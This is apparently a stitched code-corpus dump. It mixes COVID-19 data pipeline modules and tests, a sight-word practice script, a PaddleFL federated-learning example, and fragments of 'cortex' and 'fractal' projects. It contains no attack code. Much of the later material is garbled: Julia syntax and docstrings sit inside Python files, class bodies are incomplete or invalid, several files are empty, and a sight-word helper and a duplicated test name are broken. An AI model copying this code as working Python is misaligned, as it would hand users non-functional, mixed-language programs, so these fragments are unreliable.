direct_call = np.append(
_left_gauss_linear(df["val"][0:4].values, impute=True, minval=0),
_left_gauss_linear(df["val"][4:7].values, impute=True, minval=0),
)
assert np.allclose(smoothed, direct_call)
class TestSmoother:
def test_gauss_linear(self):
signal = np.ones(10)
assert np.allclose(_left_gauss_linear(signal, impute=True), signal)
assert np.all(
_left_gauss_linear(signal, impute=True, minval=2) == 2 * np.ones(10)
)
signal = np.arange(10)
assert np.allclose(_left_gauss_linear(signal, impute=True), signal)
```
#### File: jhu/tests/compare_receiving.py
```python
import pandas as pd
import os
rec_pattern = ""
# rec_pattern = "county_deaths_incidence_num"
def load_files(pattern = "", num = 1000):
rec_dir = os.listdir('../receiving')
suff = "stable"
rec_stable_dir = os.listdir(f'../receiving_{suff}')
rec_common = list(set(rec_dir) & set(rec_stable_dir))
print(set(rec_dir).symmetric_difference(rec_stable_dir))
num_iter = 0
for rec in rec_common:
if num_iter <= num:
num_iter += 1
df_rec = pd.read_csv(f'../receiving/{rec}').set_index('geo_id')
df_stable = pd.read_csv(f'../receiving_{suff}/{rec}').set_index('geo_id')
try:
df_join = df_rec.join(df_stable, rsuffix='_stable' )
except:
print(df_rec.info())
print(df_stable.info())
assert False, f"failed join on {rec}"
yield rec, df_join
def main():
load_iter = load_files(rec_pattern)
for rec, df in load_iter:
if ('msa' in rec) and False:
msa_ds = (df['val'] - df['val_stable']).sum()
print(f'{msa_ds} value diff')
if (df.eval('abs(val - val_stable)').sum() > 0.01):
print(f'Printing {rec} difference')
df_diff = df[df.eval('val != val_stable')]
print(df_diff.shape)
df_diff.to_csv(f'rec_diffs/diff_{rec}.csv')
# assert "county_confirmed_7dav_incidence_num" not in rec, f"{rec}!!!"
#input('w')
if __name__ == "__main__":
main()
```
#### File: nchs_mortality/delphi_nchs_mortality/export.py
```python
import pandas as pd
from epiweeks import Week
def export_csv(df, geo_name, sensor, export_dir, start_date):
"""Export data set in format expected for injestion by the API.
Parameters
----------
df: pd.DataFrame
data frame with columns "geo_id", "timestamp", and "val"
geo_name: str
name of the geographic region, such as "state" or "hrr"
sensor: str
name of the sensor; only used for naming the output file
export_dir: str
path to location where the output CSV files to be uploaded should be stored
start_date: datetime.datetime
The first date to report
end_date: datetime.datetime
The last date to report
"""
df = df.copy()
df = df[df["timestamp"] >= start_date]
for date in df["timestamp"].unique():
t = Week.fromdate(pd.to_datetime(str(date)))
date_short = "weekly_" + str(t.year) + str(t.week + 1).zfill(2)
export_fn = f"{date_short}_{geo_name}_{sensor}.csv"
result_df = df[df["timestamp"] == date][["geo_id", "val", "se", "sample_size"]]
result_df.to_csv(f"{export_dir}/{export_fn}",
index=False,
float_format="%.8f")
```
#### File: nchs_mortality/delphi_nchs_mortality/run.py
```python
from datetime import datetime, date, timedelta
from os.path import join
from os import remove, listdir
from shutil import copy
import numpy as np
import pandas as pd
from delphi_utils import read_params, S3ArchiveDiffer
from .pull import pull_nchs_mortality_data
from .export import export_csv
# global constants
METRICS = [
'covid_deaths', 'total_deaths', 'percent_of_expected_deaths',
'pneumonia_deaths', 'pneumonia_and_covid_deaths', 'influenza_deaths',
'pneumonia_influenza_or_covid_19_deaths'
]
SENSORS = [
"num",
"prop"
]
INCIDENCE_BASE = 100000
geo_res = "state"
def run_module():
"""Run module for processing NCHS mortality data."""
params = read_params()
export_start_date = params["export_start_date"]
if export_start_date == "latest": # Find the previous Saturday
export_start_date = date.today() - timedelta(
days=date.today().weekday() + 2)
export_start_date = export_start_date.strftime('%Y-%m-%d')
export_dir = params["export_dir"]
daily_export_dir = params["daily_export_dir"]
cache_dir = params["cache_dir"]
daily_cache_dir = params["daily_cache_dir"]
static_file_dir = params["static_file_dir"]
token = params["token"]
test_mode = params["mode"]
daily_arch_diff = S3ArchiveDiffer(
daily_cache_dir, daily_export_dir,
params["bucket_name"], "nchs_mortality",
params["aws_credentials"])
daily_arch_diff.update_cache()
map_df = pd.read_csv(
join(static_file_dir, "state_pop.csv"), dtype={"fips": int}
)
df = pull_nchs_mortality_data(token, map_df, test_mode)
for metric in METRICS:
if metric == 'percent_of_expected_deaths':
print(metric)
df["val"] = df[metric]
df["se"] = np.nan
df["sample_size"] = np.nan
sensor_name = "_".join(["wip", metric])
export_csv(
df,
geo_name=geo_res,
export_dir=daily_export_dir,
start_date=datetime.strptime(export_start_date, "%Y-%m-%d"),
sensor=sensor_name,
)
else:
for sensor in SENSORS:
print(metric, sensor)
if sensor == "num":
df["val"] = df[metric]
else:
df["val"] = df[metric] / df["population"] * INCIDENCE_BASE
df["se"] = np.nan
df["sample_size"] = np.nan
sensor_name = "_".join(["wip", metric, sensor])
export_csv(
df,
geo_name=geo_res,
export_dir=daily_export_dir,
start_date=datetime.strptime(export_start_date, "%Y-%m-%d"),
sensor=sensor_name,
)
# Weekly run of archive utility on Monday
# - Does not upload to S3, that is handled by daily run of archive utility
# - Exports issues into receiving for the API
if datetime.today().weekday() == 0:
# Copy todays raw output to receiving
for output_file in listdir(daily_export_dir):
copy(
join(daily_export_dir, output_file),
join(export_dir, output_file))
weekly_arch_diff = S3ArchiveDiffer(
cache_dir, export_dir,
params["bucket_name"], "nchs_mortality",
params["aws_credentials"])
# Dont update cache from S3 (has daily files), only simulate a update_cache() call
weekly_arch_diff._cache_updated = True
# Diff exports, and make incremental versions
_, common_diffs, new_files = weekly_arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = weekly_arch_diff.archive_exports(to_archive, update_s3=False)
# Filter existing exports to exclude those that failed to archive
succ_common_diffs = {f: diff for f, diff in common_diffs.items() if f not in fails}
weekly_arch_diff.filter_exports(succ_common_diffs)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive (weekly) '{exported_file}'")
# Daily run of archiving utility
# - Uploads changed files to S3
# - Does not export any issues into receiving
# Diff exports, and make incremental versions
_, common_diffs, new_files = daily_arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = daily_arch_diff.archive_exports(to_archive)
# Daily output not needed anymore, remove them
for exported_file in new_files:
remove(exported_file)
for exported_file, diff_file in common_diffs.items():
remove(exported_file)
remove(diff_file)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive (daily) '{exported_file}'")
```
#### File: nchs_mortality/tests/test_pull.py
```python
import pytest
from os.path import join
import pandas as pd
from delphi_utils import read_params
from delphi_nchs_mortality.pull import pull_nchs_mortality_data
params = read_params()
export_start_date = params["export_start_date"]
export_dir = params["export_dir"]
static_file_dir = params["static_file_dir"]
token = params["token"]
map_df = pd.read_csv(
join(static_file_dir, "state_pop.csv"), dtype={"fips": int}
)
class TestPullUSAFacts:
def test_good_file(self):
df = pull_nchs_mortality_data(token, map_df, "test_data.csv")
assert (df.columns.values == [
'covid_deaths', 'total_deaths', 'percent_of_expected_deaths',
'pneumonia_deaths', 'pneumonia_and_covid_deaths',
'influenza_deaths', 'pneumonia_influenza_or_covid_19_deaths',
"timestamp", "geo_id", "population"]).all()
def test_bad_file_with_inconsistent_time_col(self):
with pytest.raises(ValueError):
df = pull_nchs_mortality_data(token, map_df,
"bad_data_with_inconsistent_time_col.csv")
def test_bad_file_with_inconsistent_time_col(self):
with pytest.raises(ValueError):
df = pull_nchs_mortality_data(token, map_df,
"bad_data_with_missing_cols.csv")
```
#### File: quidel/delphi_quidel/run.py
```python
from os.path import join
import pandas as pd
from delphi_utils import read_params
from .geo_maps import geo_map
from .pull import (pull_quidel_data,
check_export_start_date,
check_export_end_date,
update_cache_file)
from .export import export_csv
from .generate_sensor import (generate_sensor_for_states,
generate_sensor_for_other_geores)
from .constants import (END_FROM_TODAY_MINUS, EXPORT_DAY_RANGE,
GEO_RESOLUTIONS, SENSORS)
from .handle_wip_sensor import add_prefix
def run_module():
params = read_params()
cache_dir = params["cache_dir"]
export_dir = params["export_dir"]
static_file_dir = params["static_file_dir"]
export_start_dates = params["export_start_date"]
export_end_dates = params["export_end_date"]
map_df = pd.read_csv(
join(static_file_dir, "fips_prop_pop.csv"), dtype={"fips": int}
)
# Pull data and update export date
dfs, _end_date = pull_quidel_data(params)
if _end_date is None:
print("The data is up-to-date. Currently, no new data to be ingested.")
return
export_end_dates = check_export_end_date(export_end_dates, _end_date,
END_FROM_TODAY_MINUS)
export_start_dates = check_export_start_date(export_start_dates,
export_end_dates,
EXPORT_DAY_RANGE)
# Add prefix, if required
sensors = add_prefix(list(SENSORS.keys()),
wip_signal=params["wip_signal"],
prefix="wip_")
for sensor in sensors:
# Check either covid_ag or flu_ag
test_type = "covid_ag" if "covid_ag" in sensor else "flu_ag"
print("state", sensor)
data = dfs[test_type].copy()
state_groups = geo_map("state", data, map_df).groupby("state_id")
first_date, last_date = data["timestamp"].min(), data["timestamp"].max()
# For State Level
state_df = generate_sensor_for_states(
state_groups, smooth=SENSORS[sensor][1],
device=SENSORS[sensor][0], first_date=first_date,
last_date=last_date)
export_csv(state_df, "state", sensor, receiving_dir=export_dir,
start_date=export_start_dates[test_type],
end_date=export_end_dates[test_type])
# County/HRR/MSA level
for geo_res in GEO_RESOLUTIONS:
print(geo_res, sensor)
data = dfs[test_type].copy()
data, res_key = geo_map(geo_res, data, map_df)
res_df = generate_sensor_for_other_geores(
state_groups, data, res_key, smooth=SENSORS[sensor][1],
device=SENSORS[sensor][0], first_date=first_date,
last_date=last_date)
export_csv(res_df, geo_res, sensor, receiving_dir=export_dir,
start_date=export_start_dates[test_type],
end_date=export_end_dates[test_type])
# Export the cache file if the pipeline runs successfully.
# Otherwise, don't update the cache file
update_cache_file(dfs, _end_date, cache_dir)
```
#### File: quidel/tests/test_handle_wip_sensor.py
```python
import unittest
from delphi_quidel.handle_wip_sensor import add_prefix
from delphi_quidel.constants import SENSORS
class MyTestCase(unittest.TestCase):
def test_handle_wip_sensor(self):
# Test wip_signal = True, Add prefix to all signals
sensors = list(SENSORS.keys())
signal_names = add_prefix(sensors, True, prefix="wip_")
assert all(s.startswith("wip_") for s in signal_names)
# Test wip_signal = list, Add prefix to signal list
signal_names = add_prefix(sensors, [sensors[0]], prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
# Test wip_signal = False, Add prefix to unpublished signals
signal_names = add_prefix(["xyzzy", sensors[0]], False, prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
if __name__ == '__main__':
unittest.main()
```
#### File: _template_python/tests/test_handle_wip_signal.py
```python
import unittest
from delphi_NAME.handle_wip_signal import add_prefix
from delphi_NAME.run import SIGNALS
from delphi_utils import read_params
def test_handle_wip_signal():
# Test wip_signal = True (all signals should receive prefix)
signal_names = add_prefix(SIGNALS, True, prefix="wip_")
assert all(s.startswith("wip_") for s in signal_names)
# Test wip_signal = list (only listed signals should receive prefix)
signal_names = add_prefix(SIGNALS, [SIGNALS[0]], prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
# Test wip_signal = False (only unpublished signals should receive prefix)
signal_names = add_prefix(["xyzzy", SIGNALS[0]], False, prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
class MyTestCase(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JedGStumpf/Sightwords",
"score": 4
}
|
#### File: JedGStumpf/Sightwords/sightlists.py
```python
import random
sight_list_1 = ['the', 'of', 'and', 'a', 'to', 'in', 'is', 'you', 'that', 'it', 'he', 'was', 'for', 'on', 'are', 'as', 'with', 'his', 'they', 'I', 'at', 'be', 'this', 'have', 'from', 'or', 'one', 'had', 'by', 'word', 'but', 'not', 'what', 'all', 'we\'re', 'we', 'when', 'your', 'can', 'said', 'there', 'use', 'an', 'each', 'which', 'she', 'do', 'how', 'their', 'if']
sight_list_2 = ['will', 'up', 'other', 'about', 'out', 'many', 'then', 'them', 'these', 'so', 'some', 'her', 'would', 'make', 'like', 'him', 'into', 'time', 'has', 'look', 'two', 'more', 'write', 'go', 'see', 'number', 'no', 'way', 'could', 'people', 'my', 'than', 'first', 'water', 'been', 'call', 'who', 'oil', 'now', 'find', 'long', 'down', 'day', 'did', 'get', 'come','made', 'may', 'part', 'over']
sight_list_3 = ['new', 'sound', 'take', 'only', 'little', 'work', 'know', 'place', 'year', 'live', 'me', 'back','give', 'most', 'very', 'after', 'thing', 'our', 'just', 'name', 'good', 'sentence', 'man', 'think', 'say', 'great', 'where', 'help', 'through', 'much', 'before', 'line', 'right', 'too', 'mean', 'old', 'any', 'same', 'tell', 'boy', 'follow', 'came', 'want', 'show', 'also', 'around', 'farm', 'three', 'small', 'set']
sight_list_4 = ['put', 'end', 'does', 'another', 'well', 'large', 'must', 'big', 'even', 'such', 'because', 'turn', 'here', 'why', 'ask', 'went', 'men', 'read', 'need', 'land', 'different', 'home', 'us', 'move', 'try', 'kind', 'hand', 'picture', 'again', 'change', 'off', 'play', 'spell', 'air', 'away', 'animal', 'house', 'point', 'page', 'letter', 'mother', 'answer', 'found', 'study', 'still', 'learn', 'should', 'America', 'world', 'high']
sight_list_5 = ['every', 'near', 'add', 'food', 'between', 'own', 'below', 'country', 'plant', 'last', 'school', 'father', 'keep', 'tree', 'never', 'start', 'city', 'earth', 'eye', 'light', 'thought', 'head', 'under', 'story', 'saw', 'left', 'don\'t', 'few', 'while', 'along', 'might', 'close', 'something', 'seem', 'next', 'hard', 'open', 'example', 'begin', 'life', 'always', 'those', 'both', 'paper', 'together', 'got', 'group', 'often', 'run', 'important']
sight_list_6 = ['until', 'children', 'side', 'feet', 'car', 'mile', 'night', 'walk', 'white', 'sea', 'began', 'grow', 'took', 'river', 'four', 'carry', 'state', 'once', 'book', 'hear', 'stop', 'without', 'second', 'late', 'miss', 'idea', 'enough', 'eat', 'face', 'watch', 'far', 'country', 'real', 'almost', 'let', 'above', 'girl', 'sometimes', 'mountain', 'cut', 'young', 'talk', 'soon', 'list', 'song', 'being', 'leave', 'family', 'it\'s', 'afternoon']
master = [sight_list_1, sight_list_2, sight_list_3, sight_list_4, sight_list_5, sight_list_6]
pick_word = ''
word = []
def word_choose(array, indexes, subindex1, subindex2):
"""Chooses a random word from pre-defined sight word lists, 6 lists in master list. Argument 'array' defaults to master, Arguments 'indexes, subindex1 and subindex2' are slices::: sub-list of master, then slices of the sub-list. """
word = array[indexes]
pick_word = random.choice(word[subindex1:subindex2])
return pick_word
def correct(word):
master.index(word_choose.word).pop(pick_word)
```
|
{
"source": "JedHong/PaddleFL",
"score": 2
}
|
#### File: examples/mlp_example_dygraph/run_customer.py
```python
import paddle.fluid as fluid
import numpy as np
import yaml
import logging
from core.dygraph.layer_handler import CustomerLayerHandler, LayerBase
from core.dygraph import CustomerExecutor
import data_iter
logging.basicConfig(
format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%Y-%m-%d %H:%M',
level=logging.DEBUG)
_LOGGER = logging.getLogger(__name__)
class MLPLayer(LayerBase):
"""
MLP: x -> emb -> pool -> fc1 -> fc2 -> label
host part: x -> emb -> pool -> fc1
customer part: fc1 -> fc2 -> label
"""
def __init__(self):
super(MLPLayer, self).__init__()
self.embed_dim = 11
self.fc2 = fluid.dygraph.nn.Linear(
input_dim=10,
output_dim=2,
act='softmax',
param_attr=fluid.ParamAttr(
initializer=fluid.initializer.ConstantInitializer(value=0.1)))
def forward(self, inputs):
# return loss
self.predict = self.fc2(inputs["fc1"])
self.loss = fluid.layers.cross_entropy(self.predict, inputs["label"])
self.loss = fluid.layers.reduce_mean(self.loss)
return self.loss
def get_fetch_vars(self):
fetch_vars = {
"predict": self.predict
}
return fetch_vars
if __name__ == "__main__":
place = fluid.CPUPlace()
fluid.enable_imperative(place)
layer = MLPLayer()
optimizer = fluid.optimizer.SGDOptimizer(
learning_rate=0.01,
parameter_list=layer.parameters())
common_vars = {
"in": ["fc1"],
"out": ["fc1@GRAD"],
}
exe = CustomerExecutor(["0.0.0.0:7858"])
exe.load_layer_handler(layer, optimizer, common_vars)
for i, item in enumerate(data_iter.iter()):
_, label = item
label_var = fluid.dygraph.to_variable(label)
fetch_vars = exe.run(
usr_key=str(i),
feed={"label": label_var})
print("fetch_vars: {}".format(fetch_vars))
```
|
{
"source": "jedhsu/cortex",
"score": 2
}
|
#### File: mold/iterate/select.py
```python
import jax.numpy as jnp
from ._operator import Manipulation
__all__ = ["Select"]
class Select(
jnp.select,
Manipulation,
):
def __init__(
self,
*args,
**kwargs,
):
super(Select, self).__init__(
*args,
**kwargs,
)
```
#### File: src/graph/move.py
```python
from .cell import Cell
from .index import IndexTensor
from .index import Test as IndexTensorTest
from .movement import MovementPath
from .shape import Shape
__all__ = ["Move"]
class Move(
IndexTensor,
):
def jump(
self,
*coordinate: int,
) -> Cell:
assert len([*coordinate]) == len(self._tensor._tensor.shape), ValueError
index = self.focus.index.add(
MovementPath.create(*coordinate),
shape=Shape(self._tensor._tensor.shape),
)
self.focused = self[index.coordinate]
return self[index.coordinate]
def step(
self,
dimension: int,
amount: int,
):
"""
Only move a single dimension.
"""
movement = [0] * self._tensor._tensor.shape
movement[dimension] = amount
return self.jump(*movement)
```
|
{
"source": "jedhsu/fractal",
"score": 2
}
|
#### File: brain/_op/weight.py
```python
from .._brain import Brain
from .parameters import Parameters
class MeanWeight(
Parameters,
Brain,
):
def mean_weight(self):
sw = sum(sum(abs(p)) for p in self.regularized_parameters())
sw = self.convert_output(sw)
return sw / self.number_of_regularized_parameters()
```
#### File: demon/basic/baseline.py
```python
# """
# Benchmark.MinMaxTS(;depth, τ=0.) <: Benchmark.Player
# Minmax baseline, which relies on [`MinMax.Player`](@ref).
# """
# @kwdef struct MinMaxTS <: Player
# depth :: Int
# amplify_rewards :: Bool
# τ :: Float64 = 0.
# end
# name(p::MinMaxTS) = "MinMax (depth $(p.depth))"
# def instantiate(p::MinMaxTS, ::AbstractGameSpec, nn)
# return MinMax.Player(
# depth=p.depth, amplify_rewards=p.amplify_rewards, τ=p.τ)
```
#### File: naive/_op/peer.py
```python
from .._demon import NaiveDemon
class Peer(NaiveDemon):
def think(
self,
mind: Mind,
):
actions = Spacetime.available_actions(game)
n = len(actions)
spectrum = ones(n) / len(actions)
return Place(
actions,
spectrum,
)
```
#### File: demon/_op/peer.py
```python
class Peer:
def peer(
self,
topos: Topos,
epoch: int,
):
fractum = player.glimpsing(game)
energy = player, energy(game, turn_number)
demon = self.apply_energy()
return actions[Util.rand_categorical(π)]
```
#### File: demon/shrewd/demon.py
```python
module MCTS
using Distributions: Categorical, Dirichlet
using ..AlphaZero: GI, Util
#####
##### Standard Oracles
#####
"""
MCTS.RolloutOracle(game_spec::AbstractGameSpec, γ=1.) <: Function
This oracle estimates the value of a position by simulating a random game
from it (a rollout). Moreover, it puts a uniform prior on available actions.
Therefore, it can be used to implement the "vanilla" MCTS algorithm.
"""
class ShrewdDemon(Physics):
gspec :: GameSpec
decay :: Float64
RolloutOracle(gspec, γ=1.) = new{typeof(gspec)}(gspec, γ)
function rollout!(game, γ=1.)
r = 0.
while !GI.game_terminated(game)
action = rand(GI.available_actions(game))
GI.play!(game, action)
r = γ * r + GI.white_reward(game)
end
return r
end
function (r::RolloutOracle)(state)
g = GI.init(r.gspec, state)
wp = GI.white_playing(g)
n = length(GI.available_actions(g))
P = ones(n) ./ n
wr = rollout!(g, r.gamma)
V = wp ? wr : -wr
return P, V
end
#####
##### AlphaZero Parameters
#####
"""
Parameters of an MCTS player.
| Parameter | Type | Default |
|:-----------------------|:-----------------------------|:--------------------|
| `num_iters_per_turn` | `Int` | - |
| `gamma` | `Float64` | `1.` |
| `cpuct` | `Float64` | `1.` |
| `temperature` | `AbstractSchedule{Float64}` | `ConstSchedule(1.)` |
| `dirichlet_noise_ϵ` | `Float64` | - |
| `dirichlet_noise_α` | `Float64` | - |
| `prior_temperature` | `Float64` | `1.` |
# Explanation
An MCTS player picks an action as follows. Given a game state, it launches
`num_iters_per_turn` MCTS iterations, with UCT exploration constant `cpuct`.
Rewards are discounted using the `gamma` factor.
Then, an action is picked according to the distribution ``π`` where
``π_i ∝ n_i^{1/τ}`` with ``n_i`` the number of times that the ``i^{\\text{th}}``
action was visited and ``τ`` the `temperature` parameter.
It is typical to use a high value of the temperature parameter ``τ``
during the first moves of a game to increase exploration and then switch to
a small value. Therefore, `temperature` is am [`AbstractSchedule`](@ref).
For information on parameters `cpuct`, `dirichlet_noise_ϵ`,
`dirichlet_noise_α` and `prior_temperature`, see [`MCTS.Env`](@ref).
# AlphaGo Zero Parameters
In the original AlphaGo Zero paper:
+ The discount factor `gamma` is set to 1.
+ The number of MCTS iterations per move is 1600, which
corresponds to 0.4s of computation time.
+ The temperature is set to 1 for the 30 first moves and then to an
infinitesimal value.
+ The ``ϵ`` parameter for the Dirichlet noise is set to ``0.25`` and
the ``α`` parameter to ``0.03``, which is consistent with the heuristic
of using ``α = 10/n`` with ``n`` the maximum number of possibles moves,
which is ``19 × 19 + 1 = 362`` in the case of Go.
"""
@kwdef struct MctsParams
gamma :: Float64 = 1.
cpuct :: Float64 = 1.
num_iters_per_turn :: Int
temperature :: AbstractSchedule{Float64} = ConstSchedule(1.)
dirichlet_noise_ϵ :: Float64
dirichlet_noise_α :: Float64
prior_temperature :: Float64 = 1.
end
"""
SamplesWeighingPolicy
During self-play, early board positions are possibly encountered many
times across several games. The corresponding samples can be merged
together and given a weight ``W`` that is a nondecreasing function of the
number ``n`` of merged samples:
- `CONSTANT_WEIGHT`: ``W(n) = 1``
- `LOG_WEIGHT`: ``W(n) = \\log_2(n) + 1``
- `LINEAR_WEIGHT`: ``W(n) = n``
"""
@enum SamplesWeighingPolicy CONSTANT_WEIGHT LOG_WEIGHT LINEAR_WEIGHT
```
#### File: _evolving/_op/streaming.py
```python
from typing import Iterator
from .._evolving import Evolving
class Streaming(Evolving, Iterator[Batch],):
def batches_iterator(self):
batchsize = min(params.batch_size, length(W))
batches = Flux.Data.DataLoader(data; batchsize, partial=false, shuffle=true,)
batches_stream = map(batches) do b
Network.convert_input_tuple(network, b)
end |> Util.cycle_iterator |> Iterators.Stateful
return new(network, samples, params, data, Wmean, Hp, batches_stream)
```
#### File: _op/_evolve/evolved.py
```python
from dataclasses import dataclass
from .optimized import Optimized
@dataclass
class Evolved(
Optimized,
):
demon_entropy: float
brain_entropy: float
def evolution_status(
tr: Trainer,
samples,
):
```
#### File: glimpse/_op/compute.py
```python
from ..glimpsing import Glimpsing
from math import sqrt
from .._state import GlimpsedWorldState
class Compute(
Glimpsing,
):
@staticmethod
def upper_confidence_bounds(
glimpsed_state: GlimpsedWorldState,
cpuct,
epsilon,
eta,
):
assert epsilon == 0 or len(eta) == len(glimpsed_state.actions)
sqrt_num_visited = sqrt(glimpsed_state.num_visited)
for i, action in enumerate(glimpsed_state.actions):
qvalue = action.energy / max(action.num_visited, 1)
if epsilon == 0:
probability = action.prior_probability
else:
# [TODO] clean me functionally
probability = (1 - epsilon) * action.prior_probability + epsilon * eta[
i
]
qvalue + cpuct * probability * sqrt_num_visited / (a.N + 1)
def depth_of_analysis(self) -> float:
"""
Return the average number of nodes that are traversed during an
MCTS simulation, not counting the root.
"""
if self.total_simulations == 0:
return 0
return self.total_nodes_traversed / self.total_simulations
```
#### File: glimpse/_op/update.py
```python
from ..glimpsing import Glimpsing
from fractal.world import WorldState
class Update(
Glimpsing,
):
def update_world_state(
self,
worldstate: WorldState,
action: Action,
energy: Energy,
):
stats = worldstate.tree[state].stats
astats = stats[action_id]
stats[action_id] = PlacementAnalysis(
astats.P,
astats.W + q,
astats.N + 1,
)
```
#### File: bicameral/_op/duel.py
```python
from dataclasses import dataclass
from typing import Optional
f64 = float
@dataclass
class Dueled:
legend: str
avgr: f64
redundancy: f64
rewards: Vector[f64]
baseline_rewards: Optional[f64]
time: f64
"""
# Two-player Games
- `rewards` is the sequence of rewards collected by the evaluated player
- `avgr` is the average reward collected by the evaluated player
- `baseline_rewards` is `nothing`
# Single-player Games
- `rewards` is the sequence of rewards collected by the evaluated player
- `baseline_rewards` is the sequence of rewards collected by the baseline player
- `avgr` is equal to `mean(rewards) - mean(baseline_rewards)`
# Common Fields
- `legend` is a string describing the evaluation
- `redundancy` is the ratio of duplicate positions encountered during the
evaluation, not counting the initial position. If this number is too high,
you may want to increase the move selection temperature.
- `time` is the computing time spent running the evaluation, in seconds
"""
class Debate:
def debate(
cls,
physics: Physics,
contender: Cortex,
baseline: Cortex,
params,
handler,
):
make_oracles = (
contender.clone(on_gpu=params.sim.use_gpu, test_mode=True),
contender.clone(on_gpu=params.sim.use_gpu, test_mode=True),
)
simulator = Glimpsing(make_oracles, record_trace)
# white = Cortex(gspec, oracles[1], params.mcts)
# black = Cortex(gspec, oracles[2], params.mcts)
# return Bicortex(white, black)
# def game_simulated():
# return Handlers.checkpoint_game_played(handler)
# samples = simulate( simulator, gspec, params.sim,
# return rewards_and_redundancy(samples, gamma=params.mcts.gamma)
# # Compare two versions of a neural network (params::ArenaParams)
# # Works for both two-player and single-player games
# def converse(physics: Physics, left: Cortex, right: Cortex, params, handler,):
# legend = "Most recent NN versus best NN so far"
# if Flow.two_players(gspec):
# (rewards_c, red), t = pit_networks(gspec, contender, baseline, params, handler,)
# avgr = mean(rewards_c)
# rewards_b = nothing
# else:
# (rewards_c, red_c), tc = cortex.evaluate(gspec, contender, params, handler,)
# (rewards_b, red_b), tb = cortex.evaluate(gspec, baseline, params, handler,)
# avgr = mean(rewards_c) - mean(rewards_b)
# red = mean([red_c, red_b])
# t = tc + tb
# return Evaluated(legend, avgr, red, rewards_c, rewards_b, t,)
```
#### File: bicameral/_op/ear.py
```python
class Ear(Mind,):
def launch_inference_server(
cortex1: Cortex,
cortex2: Cortex,
num_workers: int,
batch_size: int,
fill_batches: int,
):
pass
```
#### File: imagine/_op/imagine.py
```python
from typing import Callable
from fractal.world import World
from .._imagining import Imagining
from ..multiprocessing import Multiprocessing
class Imagine(
Imagining,
):
def imagine(
self,
world: World,
multiprocessing: Multiprocessing,
on_imagined: Callable,
):
"""
This is simulate.
"""
def imagine_parallely(
self,
world: World,
multiprocessing: Multiprocessing,
on_imagined: Callable,
):
"""
This is distributed simulate.
"""
pass
```
#### File: mind/_op/reset.py
```python
from .._demon import Demon
class Go(
Demon,
):
def reincarnate(self):
pass
```
#### File: mind/_op/stream.py
```python
def mind_stream() -> Iterator[Batch]:
batchsize = min(
params.batch_size,
length(W),
)
batches = Flux.Data.DataLoader(
data,
batchsize,
partial=false,
shuffle=true,
)
return map(
batches,
b,
)
```
#### File: mind/_processing/recalled.py
```python
class Recall:
@classmethod
def recalling(
cls,
brain: Brain,
evolve: Evolve,
analysis: Analysis,
):
# It is important to load the neural network in test mode so as to not
# overwrite the batch norm statistics based on biased data.
Tr(samples) = Evolve.evolving(mem.gspec, nn, samples, learning_params, test_mode=true,)
all_samples = samples_report(Tr(get_experience(mem)))
latest_batch = isempty(last_batch(mem)) ?
all_samples :
samples_report(Tr(last_batch(mem)))
def recalling_stage():
es = get_experience(mem)
sort!(es, by=(e->e.t))
csize = ceil(Int, length(es) / params.num_game_stages)
stages = collect(Iterators.partition(es, csize))
map(stages) do es
ts = [e.t for e in es]
stats = samples_report(Tr(es))
Report.StageSamples(minimum(ts), maximum(ts), stats)
return cls(latest_batch, all_samples, per_game_stage)
```
#### File: _flow/_op/construct.py
```python
class
def .init(spec::Spec):
env = GI.clone(spec.env)
RL.reset!(env.rlenv)
return env
end
function GI.init(spec::Spec, state)
env = GI.clone(spec.env)
RL.setstate!(env.rlenv, state)
return env
end
```
#### File: _flow/_op/flow.py
```python
class Flow:
def flow(self, place):
r =
function GI.play!(env::Env, action)
r = self.observe(action)
self.last_reward = r
return
```
#### File: placement/_op/initialize.py
```python
class PlacementAnalysis:
pass
# def initialize(
# spacetime: Spacetime,
# placing: Place,
# ):
# if placing in spacetime.tree:
# return (env.tree[state], false)
# else:
# (P, V) = env.oracle(state)
# info = init_state_info(P, V, env.prior_temperature)
# env.tree[state] = info
# return (info, true)
```
#### File: placement/_op/present.py
```python
def now():
eps = 1e-16
dummy_loss = Time.Loss(
0,
0,
0,
0,
0,
)
dummy_status = Report.LearningStatus(
dummy_loss,
0,
0,
)
return Now.Learning(
eps,
eps,
eps,
eps,
dummy_status,
[],
[],
false,
)
```
#### File: quantum/action/_probability.py
```python
class QuantumProbability(
int,
):
def __init__(
self,
probability: int,
):
super().__new__(
int,
probability,
)
```
#### File: fractum/quantum/_state.py
```python
from abc import ABCMeta
class QuantumStateMeta:
def __new__(cls, attr):
pass
def __getattribute__(self, attr: str):
return QuantumState(attr)
class QuantumState(
int,
metaclass=QuantumStateMeta,
):
pass
class Test:
class TicTacToe_QuantumState(
QuantumState,
):
Empty = 0
White = 1
Black = 2
```
#### File: _op/end/ending.py
```python
from typing import Callable
from dataclasses import dataclass
@dataclass
class WorldEnded(World):
name: str
condition: Callable[..., bool]
end_state: EndState
def states(self):
pass
def tictactoe_no_more_spaces(self):
return all(block.state == TicTacToe_Block.Empty for block in self.blocks)
def tictactoe_white_won(self):
return any(self.three_in_a_row().all_white())
def tictactoe_black_won(self):
return any(self.three_in_a_row().all_black())
TicTacToe_Full = WorldEnded("No more spaces.", TicTacToe_EndState.Draw)
```
#### File: world/_op/initialize.py
```python
from copy import deepcopy
from .._world import World
from ..nature import Nature
class Initialize(World,):
@classmethod
def initialize(cls, nature: Nature):
env = nature.deepcopy()
RL.reset!(env.rlenv)
return env
# function GI.init(spec::Spec, state)
# env = GI.clone(spec.env)
# RL.setstate!(env.rlenv, state)
# return env
# end
```
#### File: world/_op/perturb.py
```python
